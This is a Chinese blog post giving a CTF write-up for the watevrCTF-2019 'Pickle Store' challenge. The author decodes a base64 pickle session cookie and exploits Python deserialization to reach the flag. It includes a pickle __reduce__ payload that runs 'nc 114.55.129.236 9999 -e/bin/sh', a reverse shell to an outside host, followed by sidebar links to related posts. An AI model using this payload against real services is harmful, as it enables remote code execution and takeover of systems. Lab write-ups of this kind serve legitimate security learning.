Buu [watevrCTF-2019]Pickle Store

于 2024-09-11 14:19:01 发布
阅读量295 收藏 5
点赞数 3
分类专栏: CTF-Web 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79839194/article/details/142138771
版权

[watevrCTF-2019]Pickle Store

知识点:
  • python反序列化
  • 反弹shell
题解:

看到题目环境,买东西 -> 伪造Session, 随便买一个抓包,看到Session数据,并不是jwt校验

看到后面有= -> 尝试base64解码

在这里插入图片描述

还是有乱码,但是存在最后的一个哈希加密的数据 和前面买过的商品记录

我其实注意到了题目pickle(python反序列化),但是对这种数据不敏感,没想到套了一层base64加密

所以,先base64解码,再pickle反序列化得到明文

import base64
import pickle

print(pickle.loads(base64.b64decode('gAN9cQAoWAUAAABtb25leXEBTXIBWAcAAABoaXN0b3J5cQJdcQMoWBUAAABZdW1teSBzdGFuZGFyZCBwaWNrbGVxBFgUAAAAWXVtbXkgc23DtnJnw6VzZ3Vya2FxBVgVAAAAWXVtbXkgc3RhbmRhcmQgcGlja2xlcQZYFQAAAFl1bW15IHN0YW5kYXJkIHBpY2tsZXEHZVgQAAAAYW50aV90YW1wZXJfaG1hY3EIWCAAAAA2N2E2YzBjNjA2YjRlODczNTI0ZTQ5NzI5NmJlYTEwZHEJdS4=')))
-> {'money': 370, 'history': ['Yummy standard pickle', 'Yummy smörgåsgurka', 'Yummy standard pickle', 'Yummy standard pickle'], 'anti_tamper_hmac': '67a6c0c606b4e873524e497296bea10d'}

最后这个哈希值,起的肯定是校验作用,如何去破解?我不会了,去搜了wp,说是这个题可以直接通过 python反序列化,上传一个反弹shell的payload,不需要管这个校验(不懂)

python反弹shell的exp: — 需要公网ip,我看wp说是用小号在Buu开了一个什么东西,应该有些题会随机给出ip,可以去看看

import base64
import pickle


class A(object):
    def __reduce__(self):
        return (eval, ("__import__('os').system('nc 114.55.129.236 9999 -e/bin/sh')",))
a = A()
print(base64.b64encode(pickle.dumps(a)))

在网页中直接F12,修改Cookie中的值然后刷新即可

当前目录下就有flag文件

总结:

注意python反序列化的使用,pickle库,load反序列化,dump序列化

参考:

注意python反序列化的使用,pickle库,load反序列化,dump序列化

参考:

https://blog.csdn.net/mochu7777777/article/details/107589233

Liqd
关注
专栏目录
[watevrCTF-2019]Pickle Store
Kradress的博客
02-11 1873
目录思路题解总结 思路 先抓个包看看,里面有个session base64解码后拿到一串乱码,根据题目可以得知考点是pickle反序列化 import base64 import pickle print(pickle.loads(base64.b64decode("gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTY
BUU--[ZJCTF 2019]NiZhuanSiWei
cadandme的博客
05-06 424
BUU–[ZJCTF 2019]NiZhuanSiWei 刷了一道题,思路是有一些了,但还是看大佬的wp才做出来,记录一下。 看了很久才知道要get传三个参数,第一个if是限制text,传入的内容在读取文件后必须是后边的一段,这个可以使用伪协议,但 php://input 使用这个协议时失败了,与之相似的写入文件的协议还有data协议,使用这个协议 ?text=data://text/plain;base64,[d2VsY29tZSB0byB0aGUgempjdGY=] 第二个if 这个来查看文件的,
[watevrCTF-2019]Pickle StorePickle反序列化】
D.MIND 的博客
04-29 2251
文章目录Pickle反序列化简单字符类型的反序列化类的反序列化`__reduce__`命令行下输入命令:python下反弹shell一、curl+base64二、curl -d三、nc 反弹shell 一进来看看Cookie处,果然又是一个session gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGVi
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
buu-[2019红帽杯]easyRE
qaq517384的博客
03-05 571
查壳 64位ida 直接查看字符串能看到you found me和一些奇怪字符串 有些类似base的东西 先找you found me 跟进后CTRL+X交叉引用找到函数,f5查看伪代码 signed __int64 sub_4009C6() { signed __int64 result; // rax __int64 v1; // ST10_8 __int64 v2; // ST18_8 __int64 v3; // ST20_8 __int64 v4; // ST28_8
BUU刷题--[GWCTF 2019]我有一个数据库
weixin_48631429的博客
12-02 588
我有一个数据库 打开看到这样一堆文字,读不懂,也没有其他的信息。 怎么想也想不到该怎么做,buu还不能扫描。所以只能看了wp,看到有一个/phpmyadmin,回来开始想怎么做 phpmyadmin版本信息4.8.1,搜索一下有什么漏洞。 任意文件包含:那么我们就可以利用来读flag ?target=db_datadict.php%253f/../../../../../../../../../flag 拿到flag 考点就是CVE-2018-12613 ...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
python反序列化-[watevrCTF-2019]Pickle Store
snowlyzz的博客
09-01 942
详细讲解pickle
BUUCTF--[watevrCTF-2019]Pickle Store
qq_46263951的博客
08-08 422
一般看到商店需要购买flag的直接就会想到session和cookie 我们先将session的值来接
BUUCTF:[watevrCTF-2019]Pickle Store
末初的CSDN博客
07-26 1187
题目地址:https://buuoj.cn/challenges#[watevrCTF-2019]Pickle%20Store Pickle反序列化 使用pickle.loads()和base64对这串字符进行解码反序列化 利用Pickle反序列化exp反弹shell 在Buu的小号上开一台内网靶机 import base64 import pickle class A(object): def __reduce__(self): return (eval, ("__imp
BUUCTF之[watevrCTF-2019]Cookie Store
weixin_44632787的博客
07-30 385
BUUCTF之[watevrCTF-2019]Cookie Store 打开挑战页面发现它说你初始基金是50,但是购买flag需要100 然后参考源码和访问robots.txt都没有发现什么重要的信息,所以就用BurpSuite抓包试试看… 一开始是以为在id里面试试注入的,但是随便输入一些信息都没有看到什么可疑的,但是后来注意到cookie那里有个很像base64的加密,所以解密试试看有什么东西 结果发现!!! 所以payload: eyJtb25leSI6IDEwMCwgImhpc3Rvcnki
python之JASON和pickle序列化与反序列化
anchaoxi6967的博客
05-02 87
json 和pickle 用于序列化的两个模块 json,用于字符串 和 python数据类型间进行转换 pickle,用于python特有的类型 和 python的数据类型间进行转换 Json模块提供了四个功能:dumps、dump、loads、load pickle模块提供了四个功能:dumps、dump、loads、load 同理,在JASON反序列化是...
[watevrCTF-2019]Pickle Store pickle序列化漏洞~~
a3320315的博客
02-12 1803
题目介绍 要有1000美元买flag,然后我们查看header,扫目录之类的操作,最后在cookie中发现问题~~ gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGViNjJxBXUu 先试试b...
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值